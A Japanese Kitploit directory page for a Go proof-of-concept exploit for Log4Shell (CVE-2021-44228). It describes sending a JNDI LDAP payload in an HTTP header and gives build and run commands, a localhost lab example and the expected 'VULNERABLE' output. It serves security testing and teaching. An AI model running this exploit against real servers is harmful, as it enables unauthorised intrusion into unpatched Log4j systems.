Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228 — Goで書かれたシンプルなLog4j PoC | Kitploit
ツール/GitHubGitHub/sorrence/cve-2021-44228
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubsorrence/cve-2021-44228

CVE-2021-44228

Goで書かれたシンプルなLog4j PoC

リポジトリを見る
10ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-44228 PoC (Log4Shell)

⚠️ 免責事項:
このツールは教育目的、セキュリティ研究、および管理されたテスト環境のみを対象としています。
明示的な許可なくシステムに対して使用することは違法であり、その責任はすべて利用者にあります。


📌 説明

このプロジェクトには、Apache Log4j2(CVE-2021-44228)の脆弱性に対するシンプルな概念実証(PoC)エクスプロイトが含まれています。
PoCは、JNDI LDAPペイロードを含む特別に細工されたHTTPヘッダーをターゲットに送信します。
ターゲットが脆弱な場合、指定されたLHOSTアドレスに
コールバック
を送信します。


🚀 使用方法

1️⃣ ビルド

root@kitploit:~
go build -o exploit exploit.go

2️⃣ 実行

root@kitploit:~
sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
  • -r → ターゲットURL(脆弱なアプリケーションのエンドポイント)
  • -l → コールバックリスナーのIPアドレス(PoCを実行するマシン)

🛠️ 例

提供されているDocker脆弱性アプリを使用する場合:

root@kitploit:~
# 脆弱性アプリを実行
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app

# エクスプロイトを実行
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1

期待される出力:

root@kitploit:~
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE
ツールをダウンロード